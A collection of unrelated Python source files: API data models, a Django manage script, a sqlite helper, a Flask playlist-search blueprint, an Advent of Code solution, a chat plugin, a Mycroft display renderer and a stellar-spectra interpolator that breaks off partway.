class UpdatePullRequestApprovalRuleContentOutput(CreatePullRequestApprovalRuleOutput):
pass
class CommitObjectsList(BaseModel):
__root__: List[Commit]
class RepositoryMetadataList(BaseModel):
__root__: List[RepositoryMetadata]
class ConflictMetadata(BaseModel):
"""
Information about the metadata for a conflict in a merge operation.
"""
filePath: Optional[Path] = None
fileSizes: Optional[FileSizes] = None
fileModes: Optional[FileModes] = None
objectTypes: Optional[ObjectTypes] = None
numberOfConflicts: Optional[NumberOfConflicts] = None
isBinaryFile: Optional[IsBinaryFile] = None
contentConflict: Optional[IsContentConflict] = None
fileModeConflict: Optional[IsFileModeConflict] = None
objectTypeConflict: Optional[IsObjectTypeConflict] = None
mergeOperations: Optional[MergeOperations] = None
class Conflict(BaseModel):
"""
Information about conflicts in a merge operation.
"""
conflictMetadata: Optional[ConflictMetadata] = None
mergeHunks: Optional[MergeHunks] = None
class ConflictMetadataList(BaseModel):
__root__: List[ConflictMetadata]
class ReplaceContentEntries(BaseModel):
__root__: List[ReplaceContentEntry]
class ConflictResolution(BaseModel):
"""
If AUTOMERGE is the conflict resolution strategy, a list of inputs to use when resolving conflicts during a merge.
"""
replaceContents: Optional[ReplaceContentEntries] = None
deleteFiles: Optional[DeleteFileEntries] = None
setFileModes: Optional[SetFileModeEntries] = None
class PutFileEntries(BaseModel):
__root__: List[PutFileEntry]
class PullRequest(BaseModel):
"""
Returns information about a pull request.
"""
pullRequestId: Optional[PullRequestId] = None
title: Optional[Title] = None
description: Optional[Description] = None
lastActivityDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
pullRequestStatus: Optional[PullRequestStatusEnum] = None
authorArn: Optional[Arn] = None
pullRequestTargets: Optional[PullRequestTargetList] = None
clientRequestToken: Optional[ClientRequestToken] = None
revisionId: Optional[RevisionId] = None
approvalRules: Optional[ApprovalRulesList] = None
class PullRequestEventList(BaseModel):
__root__: List[PullRequestEvent]
class ReactionsForCommentList(BaseModel):
__root__: List[ReactionForComment]
class RepositoryTriggersList(BaseModel):
__root__: List[RepositoryTrigger]
class BatchGetCommitsOutput(BaseModel):
commits: Optional[CommitObjectsList] = None
errors: Optional[BatchGetCommitsErrorsList] = None
class BatchGetRepositoriesOutput(BaseModel):
"""
Represents the output of a batch get repositories operation.
"""
repositories: Optional[RepositoryMetadataList] = None
repositoriesNotFound: Optional[RepositoryNotFoundList] = None
class CreateCommitInput(BaseModel):
repositoryName: RepositoryName
branchName: BranchName
parentCommitId: Optional[CommitId] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
putFiles: Optional[PutFileEntries] = None
deleteFiles: Optional[DeleteFileEntries] = None
setFileModes: Optional[SetFileModeEntries] = None
class CreatePullRequestOutput(BaseModel):
pullRequest: PullRequest
class CreateUnreferencedMergeCommitInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
mergeOption: MergeOptionTypeEnum
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class DescribeMergeConflictsOutput(BaseModel):
conflictMetadata: ConflictMetadata
mergeHunks: MergeHunks
nextToken: Optional[NextToken] = None
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
class DescribePullRequestEventsOutput(BaseModel):
pullRequestEvents: PullRequestEventList
nextToken: Optional[NextToken] = None
class GetCommentReactionsOutput(BaseModel):
reactionsForComment: ReactionsForCommentList
nextToken: Optional[NextToken] = None
class GetMergeConflictsOutput(BaseModel):
mergeable: IsMergeable
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
conflictMetadataList: ConflictMetadataList
nextToken: Optional[NextToken] = None
class GetPullRequestOutput(CreatePullRequestOutput):
pass
class GetRepositoryTriggersOutput(BaseModel):
"""
Represents the output of a get repository triggers operation.
"""
configurationId: Optional[RepositoryTriggersConfigurationId] = None
triggers: Optional[RepositoryTriggersList] = None
class MergeBranchesBySquashInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergeBranchesByThreeWayInput(BaseModel):
repositoryName: RepositoryName
sourceCommitSpecifier: CommitName
destinationCommitSpecifier: CommitName
targetBranch: Optional[BranchName] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergePullRequestByFastForwardOutput(BaseModel):
pullRequest: Optional[PullRequest] = None
class MergePullRequestBySquashOutput(MergePullRequestByFastForwardOutput):
pass
class MergePullRequestBySquashInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
commitMessage: Optional[Message] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergePullRequestByThreeWayOutput(MergePullRequestByFastForwardOutput):
pass
class MergePullRequestByThreeWayInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
commitMessage: Optional[Message] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class PutRepositoryTriggersInput(BaseModel):
"""
Represents the input of a put repository triggers operation.
"""
repositoryName: RepositoryName
triggers: RepositoryTriggersList
class TestRepositoryTriggersInput(BaseModel):
"""
Represents the input of a test repository triggers operation.
"""
repositoryName: RepositoryName
triggers: RepositoryTriggersList
class UpdatePullRequestDescriptionOutput(CreatePullRequestOutput):
pass
class UpdatePullRequestStatusOutput(CreatePullRequestOutput):
pass
class UpdatePullRequestTitleOutput(CreatePullRequestOutput):
pass
class Conflicts(BaseModel):
__root__: List[Conflict]
class BatchDescribeMergeConflictsOutput(BaseModel):
conflicts: Conflicts
nextToken: Optional[NextToken] = None
errors: Optional[BatchDescribeMergeConflictsErrors] = None
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
|
#!h:\django~1\attend~1\myenv\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
import sqlite3
from sqlite3 import Error
class DBHelper:
def __init__(self, filedb='db/pythonsqlite3.db'):
self.filedb=filedb
def __connect__(self):
try:
self.con = sqlite3.connect(self.filedb)
self.cur = self.con.cursor()
except Error as e:
print(e)
def __disconnect__(self):
self.con.close()
def fetch(self, sql):
self.__connect__()
self.cur.execute(sql)
result = self.cur.fetchall()
self.__disconnect__()
return result
def execute(self, sql):
self.__connect__()
self.cur.execute(sql)
self.con.commit()
self.__disconnect__()
def manipulate(self, sql, task):
self.__connect__()
self.cur.execute(sql, task)
self.con.commit()
self.__disconnect__()
return self.cur.lastrowid
|
# -*- coding: utf-8 -*-
from .abod import ABOD
from .cblof import CBLOF
from .combination import aom, moa, average, maximization
from .feature_bagging import FeatureBagging
from .hbos import HBOS
from .iforest import IForest
from .knn import KNN
from .lof import LOF
from .mcd import MCD
from .ocsvm import OCSVM
from .pca import PCA
__all__ = ['ABOD',
'CBLOF',
'aom', 'moa', 'average', 'maximization',
'FeatureBagging',
'HBOS',
'IForest',
'KNN',
'LOF',
'MCD',
'OCSVM',
'PCA']
|
import io
from setuptools import setup, find_packages
from sotabenchapi.version import __version__
name = "sotabenchapi"
author = "Robert Stojnic"
author_email = "hello@sotabench.com"
license = "Apache-2.0"
url = "https://sotabench.com"
description = (
"Easily benchmark Machine Learning models on selected tasks and datasets."
)
setup(
name=name,
version=__version__,
author=author,
author_email=author_email,
maintainer=author,
maintainer_email=author_email,
description=description,
long_description=io.open("README.md", "r", encoding="utf-8").read(),
long_description_content_type="text/markdown",
url=url,
platforms=["Windows", "POSIX", "MacOSX"],
license=license,
packages=find_packages(),
install_requires=io.open("requirements.txt").read().splitlines(),
entry_points="""
[console_scripts]
sb=sotabenchapi.__main__:cli
""",
)
|
# -*- coding: utf-8 -*-
"""
spotty_search.search.controllers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Flask Blueprint for searching
"""
from flask import Blueprint, jsonify, Response
from spotty_search.api import spot
from spotty_search.search import fuzzy_search
# init Flask Blueprint at /search/ directory
search = Blueprint('search', __name__, url_prefix='/search')
@search.route('/', methods=['GET'])
def index() -> Response:
return jsonify({'status': 'success'})
@search.route("/<query>")
def searcher(query: str) -> Response:
results = fuzzy_search(query, spot.playlists_and_tracks)
return jsonify(
{
playlist_id: {
'score': score,
'playlist': spot.playlists[playlist_id]
}
for (score, playlist_id, data) in results
}
)
@search.route("/playlists")
def playlists() -> Response:
""" Returns JSON of user's playlists
"""
return jsonify(spot.playlists)
@search.route("/playlist/<id>")
def playlist(id: str) -> Response:
""" Returns JSON of `id` playlist's info
"""
return jsonify(spot.playlists[id])
@search.route("/playlist/<id>/tracks")
def playlist_tracks(id: str) -> Response:
""" Returns tracks in `id` playlist
"""
return jsonify([track for track in spot.playlists[id].tracks])
@search.route("playlistsandtracks")
def playlists_and_tracks() -> Response:
""" Returns JSON with playlist id as key and tracks as elements
"""
return jsonify(spot.playlists_and_tracks)
"""
************************************
** **
** returning raw json from pyfy **
** **
************************************
"""
@search.route("old/playlists")
def old_playlists() -> Response:
""" Returns user's playlists
"""
return jsonify(spot.spt.user_playlists())
@search.route("old/playlist/<id>")
def old_playlist(id: str) -> Response:
""" Returns JSON of `id` playlist's info
"""
return jsonify(spot.spt.playlist_tracks(id))
@search.route("old/playlist/<id>/tracks")
def old_playlist_tracks(id: str) -> Response:
""" Returns tracks in `id` playlist
"""
return jsonify([
track['track']['name']
for track
in spot.spt.playlist_tracks(id)['items']
])
|
def part_1(data):
chart = [([c for c in line] + [' '] * 200)[:200] for line in data]
x, y = chart[0].index('|'), 0
dx, dy = 0, 1
letters = []
while True:
x, y = x+dx, y+dy
symbol = chart[y][x]
if symbol == ' ':
return "".join(letters)
elif symbol.isalpha():
letters.append(symbol)
elif symbol == '+':
for n in get_neighbours((x, y)):
if n[0] == x - dx or n[1] == y - dy:
continue
if chart[n[1]][n[0]] == '|' or chart[n[1]][n[0]] == '-':
dx, dy = n[0] - x, n[1] - y
break
def part_2(data):
chart = [([c for c in line] + [' ']*200)[:200] for line in data]
x, y = chart[0].index('|'), 0
dx, dy = 0, 1
steps = 0
while True:
steps += 1
x, y = x + dx, y + dy
symbol = chart[y][x]
if symbol == ' ':
return steps
elif symbol == '+':
for n in get_neighbours((x, y)):
if n[0] == x - dx or n[1] == y - dy:
continue
if chart[n[1]][n[0]] == '|' or chart[n[1]][n[0]] == '-':
dx, dy = n[0] - x, n[1] - y
break
def get_neighbours(point):
return [(point[0] + dx, point[1] + dy) for dx in range(-1, 2)
for dy in range(-1, 2)
if (dx == 0) ^ (dy == 0)]
if __name__ == '__main__':
with open('day_19_input.txt') as f:
inp = f.readlines()
print("Part 1 answer: " + str(part_1(inp)))
print("Part 2 answer: " + str(part_2(inp)))
|
from datetime import time
from mongoengine import DoesNotExist
from pytz import UTC
from models import ChatPeriodicTask
from exceptions import SocialCreditError
from .options import TransactionLimitChatOptions, TransactionLimitProfileOptions
from .signals import *
from .periodic import *
DEFAULT_TIME = time(hour=17, tzinfo=UTC)
DEFAULT_LIMIT = 10
HELP_TEXT = '''Implements daily transaction limit: any profile can rank only limited number of messages a day.
Default limit is {limit}, resets every day at {time} o'clock UTC.'''
# TODO add following to help text, when set_plugin_option goes public
# Available options:
# * limit - changes transaction limit for everyone in the chat. Applies, when limit is reset.'''
def enable(chat):
try:
options = chat.plugin_options.get(plugin_name='transaction_limit')
except DoesNotExist:
pass
else:
raise SocialCreditError('Plugin is already enabled.')
chat_options = TransactionLimitChatOptions(plugin_name='transaction_limit', limit=DEFAULT_LIMIT)
profiles = chat.get_profiles()
chat.plugin_options.append(chat_options)
chat.plugin_options.save()
for profile in profiles:
profile_option = TransactionLimitProfileOptions(plugin_name='transaction_limit', transactions_left=DEFAULT_LIMIT)
profile.plugin_options.append(profile_option)
profile.plugin_options.save()
ChatPeriodicTask(
chat=chat,
plugin_name='transaction_limit',
module='reset_transactions',
time=DEFAULT_TIME,
).save()
def disable(chat):
try:
options = chat.plugin_options.get(plugin_name='transaction_limit')
except DoesNotExist:
raise SocialCreditError('Plugin is already disabled.')
profiles = chat.get_profiles()
chat.plugin_options.remove(options)
chat.plugin_options.save()
for profile in profiles:
profile_options = profile.plugin_options.get(plugin_name='transaction_limit')
profile.plugin_options.remove(profile_options)
profile.plugin_options.save()
ChatPeriodicTask.objects.get(
chat=chat,
plugin_name='transaction_limit',
module='reset_transactions',
).delete()
def get_help():
return HELP_TEXT, {'time': DEFAULT_TIME.hour, 'limit': DEFAULT_LIMIT}
|
# Copyright 2021, Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Render the time on an Arduino faceplate, such as on the Mark I."""
ALARM_INDICATOR = "CIAACA"
CHARACTER_WIDTH = 4
FACEPLATE_WIDTH = 32
NINE_COLUMN_BLANK = "JIAAAAAAAAAAAAAAAAAA"
NO_ALARM_INDICATOR = "CIAAAA"
SEVEN_COLUMN_BLANK = "HIAAAAAAAAAAAAAA"
class FaceplateRenderer:
"""Display data on a Mark I or device with similar faceplate."""
def __init__(self, enclosure, display_time: str):
self.enclosure = enclosure
self.display_time = display_time
# Map characters to the display encoding for a Mark 1
# (4x8 except colon, which is 2x8)
self.character_codes = {
':': 'CIICAA',
'0': 'EIMHEEMHAA',
'1': 'EIIEMHAEAA',
'2': 'EIEHEFMFAA',
'3': 'EIEFEFMHAA',
'4': 'EIMBABMHAA',
'5': 'EIMFEFEHAA',
'6': 'EIMHEFEHAA',
'7': 'EIEAEAMHAA',
'8': 'EIMHEFMHAA',
'9': 'EIMBEBMHAA',
}
def render_time(self, alarm_is_set: bool):
"""Draw the time centered on the faceplate and an alarm indicator.
Args:
alarm_is_set: Indicates if the alarm skill has one or more active alarms
"""
self._render_left_padding()
self._render_time_characters()
self._render_alarm_indicator(alarm_is_set)
self._render_right_padding()
def _render_left_padding(self):
"""Draw blanks to the left of the time.
For 4-character times (e.g. 1:23), draw 9 blank columns. For 5-character
times (e.g. 12:34) draw 7 blank columns.
"""
if len(self.display_time) == 4:
image_code = NINE_COLUMN_BLANK
else:
image_code = SEVEN_COLUMN_BLANK
self.enclosure.mouth_display(img_code=image_code, refresh=False)
def _render_time_characters(self):
"""Draw the time, centered on display.
Calculate the x_coordinate that represents where the first character of the
time should be drawn for the time to appear centered. Then draw the characters
starting from that point.
"""
time_width = (CHARACTER_WIDTH * len(self.display_time)) - 2
x_coordinate = (FACEPLATE_WIDTH - time_width) / 2
for character in self.display_time:
self.enclosure.mouth_display(
img_code=self.character_codes[character], x=x_coordinate, refresh=False
)
x_coordinate += 2 if character == ":" else 4
def _render_right_padding(self):
"""Draw blanks to the right of the time.
For 4-character times (e.g. 1:23), draw 9 blank columns. For 5-character
times (e.g. 12:34) draw 7 blank columns.
"""
if len(self.display_time) == 4:
image_code = NINE_COLUMN_BLANK
x_coordinate = 22
else:
image_code = SEVEN_COLUMN_BLANK
x_coordinate = 24
self.enclosure.mouth_display(img_code=image_code, x=x_coordinate, refresh=False)
def _render_alarm_indicator(self, alarm_is_set: bool):
"""Show a dot in the upper-left corner of the faceplate if an alarm is set.
Args:
alarm_is_set: indicates whether or not the alarm skill has active alarms.
"""
if alarm_is_set:
image_code = ALARM_INDICATOR
else:
image_code = NO_ALARM_INDICATOR
self.enclosure.mouth_display(img_code=image_code, x=29, refresh=False)
|
# encoding: utf-8
"""
@author: zeming li
@contact: zengarden2009@gmail.com
@file: __init__.py.py
"""
if __name__ == '__main__':
pass
|
""" Lejeune interpolator is basically a linear interpolator for a Lejeune grid
based spectral library.
This is the simplest interpolator but most commonly used.
It takes care of boundary conditions by imposing limits to extrapolation on a
given grid.
"""
import numpy as np
from .interpolator import BaseInterpolator
def __det3x3__(a):
""" compute the 3x3 determinant of an array
Hard coded equations are 8 times faster than np.linalg.det for a matrix 3x3
Parameters
----------
a: ndarray, shape=(3,3), dtype=float
array matrix
Returns
-------
val: float
determinant of a
"""
val = +a[0] * (a[4] * a[8] - a[7] * a[5])
val += -a[1] * (a[3] * a[8] - a[6] * a[5])
val += +a[2] * (a[3] * a[7] - a[6] * a[4])
return val
def __interp__(T0, g0, T,g, dT_max=0.1, eps=1e-6):
"""
Interpolation of the (T,g) grid at fixed Z
Translated from Pegase.2 fortran version
(this may not be pythonic though)
Note: preference is always given to the temperature over
the gravity when needed.
Parameters
----------
T0: float
log(Teff) to obtain
g0: float
log(g) to obtain
T: float
log(Teff) of the grid
g: float
log(g) of the grid
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
Returns
-------
idx: ndarray, dtype=int, size=4
4 star indexes
w: ndarray, dtype=float, size=4
4 associated weights
..note::
if index is -1, this means the point is rejected and the associated
weight is 0.
Naming conventions
------------------
i1 = index of the star with temperature > T and gravity > g.
Among all such stars, one chooses the one minimizing
|Delta T|+kappa*|Delta g|.
If no star with temperature > T and gravity > g exists, i1 = -1
i2 = index of the star with temperature > T and gravity < g.
i3 = index of the star with temperature < T and gravity > g.
i4 = index of the star with temperature < T and gravity < g.
g
/|\
| i3 |
| | i1
| ----x------
| | i2
| i4 |
|__________\ T
/
"""
kappa = 0.1
idx = np.arange(len(g))
deltag = g - g0
deltaT = T - T0
dist = kappa * abs(deltag) + abs(deltaT)
if dist.min() == 0:
return np.array((dist.argmin(),-1,-1,-1)), np.array((1.,0.,0.,0.))
# Looking for i_{1..4}
ind_dT = deltaT >= 0
ind_dg = deltag >= 0
# i1
ind = (ind_dT & ind_dg)
if True in ind:
i1 = idx[ind][dist[ind].argmin()]
else:
i1 = -1
# i2
ind = (ind_dT & ~ind_dg)
if True in ind:
i2 = idx[ind][dist[ind].argmin()]
else:
i2 = -1
# i3
ind = (~ind_dT & ind_dg)
if True in ind:
i3 = idx[ind][dist[ind].argmin()]
else:
i3 = -1
# i4
ind = (~ind_dT & ~ind_dg)
if True in ind:
i4 = idx[ind][dist[ind].argmin()]
else:
i4 = -1
# checking integrity
if ( (i1 < 0) & (i2 < 0) & (i3 < 0) & (i4 < 0) ):
raise ValueError("Interp. Error, could not find appropriate knots")
T1 = T[i1]
T2 = T[i2]
T3 = T[i3]
T4 = T[i4]
g1 = g[i1]
g2 = g[i2]
g3 = g[i3]
g4 = g[i4]
# If, T2 (resp. T1) is too far from T compared to T1
# (resp. T2), i2 (resp. i1) is not used.
# The same for i3 and i4.
if ( (i1 > 0) & (i2 > 0) ):
if (T1 < T2 - dT_max):
i2 = -1
elif (T2 < T1 - dT_max):
i1 = -1
if ( (i3 > 0) & (i4 > 0) ):
if (T3 > T4 + dT_max):
i4 = -1
elif (T4 > T3 + dT_max):
i3 = -1
if ( (i1 < 0) & (i2 < 0) & (i3 < 0) & (i4 < 0) ):
raise ValueError("Interp. Error, could not find appropriate knots")
# Interpolation in the (T, g) plane between the used points
# (at least 1, at most 4).
# Code "0110" means that i1 = i4 = 0, i2 /=0 and i3 /= 0.
#
# Note: preference is always given to the temperature over
# the gravity when needed.
if (i1 < 0):
if (i2 < 0):
if (i3 < 0):
if (i4 < 0):
# # 0000
raise ValueError("Error") # should not be possible
else: # 0001
alpha1 = 0.
alpha2 = 0.
alpha3 = 0.
alpha4 = 1.
# endif
elif (i4 < 0): # 0010
alpha1 = 0.
alpha2 = 0.
alpha3 = 1.
alpha4 = 0.
else: # 0011
alpha1 = 0.
alpha2 = 0.
if ( abs(T3 - T4) < eps ):
if (g3 == g4):
alpha3 = 0.5
else:
alpha3 = (g0 - g4) / (g3 - g4)
# endif
alpha4 = 1. - alpha3
else:
if (T3 > T4):
alpha3 = 1.
alpha4 = 0.
i4 = -1
else:
alpha3 = 0.
i3 = -1
alpha4 = 1.
# endif
# endif
# endif
elif (i3 < 0):
if (i4 < 0):
# # 0100
alpha1 = 0.
alpha2 = 1.
alpha3 = 0.
alpha4 = 0.
else: # 0101
alpha1 = 0.
if (T2 == T4):
alpha2 = 0.5
else:
alpha2 = (T0 - T4) / (T2 - T4)
# endif
alpha3 = 0.
alpha4 = 1. - alpha2
# endif
elif (i4 < 0): # 0110
alpha1 = 0.
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
else: # 0111
# Assume that (T, g) is within the triangle i
# formed by the three points.
mat0 = np.asarray([
[ T2, T3, T4 ],
[ g2, g3, g4 ],
[ 1., 1., 1. ] ])
mat2 = np.asarray([
[ T0, T3, T4 ],
[ g0, g3, g4 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T2, T0, T4 ],
[ g2, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T2, T3, T0 ],
[ g2, g3, g0 ],
[ 1., 1., 1. ] ])
det0 = __det3x3__(mat0.ravel())
det2 = __det3x3__(mat2.ravel())
det3 = __det3x3__(mat3.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = 0.
alpha2 = det2 / det0
alpha3 = det3 / det0
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed
# by the three used points use only two points.
if ((alpha2 < 0.) | (alpha2 > 1. ) | (alpha3 < 0.) | (alpha3 > 1.) |
(alpha4 < 0.) | (alpha4 > 1. ) ):
alpha1 = 0.
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
i4 = -1
# endif
# endif
elif (i2 < 0):
if (i3 < 0):
if (i4 < 0):
# # 1000
alpha1 = 1.
alpha2 = 0.
alpha3 = 0.
alpha4 = 0.
else: # 1001
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
alpha3 = 0.
alpha4 = 1. - alpha1
# endif
elif (i4 < 0): # 1010
if (T1 == T3):
alpha1 = 0.5
else:
alpha1 = (T0 - T3) / (T1 - T3)
# endif
alpha2 = 0.
alpha3 = 1. - alpha1
alpha4 = 0.
else: # 1011
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T3, T4 ],
[ g1, g3, g4 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T3, T4 ],
[ g0, g3, g4 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T1, T0, T4 ],
[ g1, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T1, T3, T0 ],
[ g1, g3, g0 ],
[ 1., 1., 1.] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det3 = __det3x3__(mat3.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = det1 / det0
alpha2 = 0.
alpha3 = det3 / det0
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha3 < 0.) | (alpha3 > 1.) | (alpha4 < 0.) | (alpha4 > 1.) ):
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
alpha3 = 0.
i3 = -1
alpha4 = 1. - alpha1
# endif
# endif
elif (i3 < 0):
if (i4 < 0):
# # 1100
if (abs(T1 - T2) < eps):
if (g1 == g2):
alpha1 = 0.5
else:
alpha1 = (g0 - g2) / (g1 - g2)
# endif
alpha2 = 1. - alpha1
else:
if (T1 < T2):
alpha1 = 1.
alpha2 = 0.
i2 = -1
else:
alpha1 = 0.
i1 = -1
alpha2 = 1.
# endif
# endif
alpha3 = 0.
alpha4 = 0.
else: # 1101
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T2, T4 ],
[ g1, g2, g4 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T2, T4 ],
[ g0, g2, g4 ],
[ 1., 1., 1.] ])
mat2 = np.asarray([
[ T1, T0, T4 ],
[ g1, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T1, T2, T0 ],
[ g1, g2, g0 ],
[ 1., 1., 1. ] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det2 = __det3x3__(mat2.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = det1 / det0
alpha2 = det2 / det0
alpha3 = 0.
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha2 < 0.) | (alpha2 > 1.) | (alpha4 < 0.) | (alpha4 > 1.) ):
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
i2 = -1
alpha3 = 0.
alpha4 = 1. - alpha1
# endif
# endif
elif (i4 < 0):
# # 1110
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T2, T3 ],
[ g1, g2, g3 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T2, T3 ],
[ g0, g2, g3 ],
[ 1., 1., 1.] ])
mat2 = np.asarray([
[ T1, T0, T3 ],
[ g1, g0, g3 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T1, T2, T0 ],
[ g1, g2, g0 ],
[ 1., 1., 1.] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det2 = __det3x3__(mat2.ravel())
det3 = __det3x3__(mat3.ravel())
alpha1 = det1 / det0
alpha2 = det2 / det0
alpha3 = det3 / det0
alpha4 = 0.
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha2 < 0.) | (alpha2 > 1.) | (alpha3 < 0.) | (alpha3 > 1.) ):
alpha1 = 0.
i1 = -1
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
# endif
# endif
# All four points used.
if ( (i3 >= 0) & (i4 >= 0) & (i1 >= 0) & (i2 >= 0) ):
if (T1 != T3):
alpha = (T0 - T3) / (T1 - T3)
else:
alpha = 0.5
# endif
if (T2 != T4):
beta = (T0 - T4) / (T2 - T4)
else:
beta = 0.5
# endif
gprim = alpha * g1 + (1 - alpha) * g3
gsec = beta * g2 + (1 - beta ) * g4
if (gprim != gsec):
gamma = ( g0 - gsec ) / ( gprim - gsec )
else:
gamma = 0.5
# endif
alpha1 = alpha * gamma
alpha2 = beta * ( 1 - gamma )
alpha3 = ( 1 - alpha ) * gamma
alpha4 = ( 1 - beta ) * ( 1 - gamma )
# endif
return np.asarray((i1, i2, i3, i4)), np.asarray((alpha1, alpha2, alpha3, alpha4))
'''
class LejeuneInterpolator(BaseInterpolator):
""" Interpolation for grid based on the Lejeune library definition
The interpolation is N-D linear in log-temperature, log-gravity, and linear
in metallicity Z. Preference is always given to the temperature over the
gravity when needed.
This version is translated from Pegase
Attributes
----------
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
"""
def __init__(self, osl, dT_max=0.1, eps=1e-6, *args, **kwargs):
BaseInterpolator.__init__(self, osl, *args, **kwargs)
self.dlogT_max = dT_max
self.eps = eps
self.osl = osl
def interp(self, aps, weights=None, **kwargs):
return self.interp_other(aps, self.osl.spectra, weights=weights, **kwargs)
def interp_other(self, aps, other, weights=None, **kwargs):
# get osl data
osl_logT, osl_logg, osl_logZ = self.osl.get_interpolation_data().T[:3]
grid_logZ = np.unique(osl_logZ)
if np.ndim(other) < 2:
values = np.atleast_2d([other]).T
else:
values = np.atleast_2d(other)
# params
library_index = np.arange(len(osl_logT), dtype=int)
_aps = np.atleast_2d(aps)
if weights is None:
_weights = np.ones(len(_aps), dtype=float)
elif np.ndim(weights) == 0:
_weights = np.ones(len(_aps), dtype=float) * weights
else:
_weights = weights
final_values = []
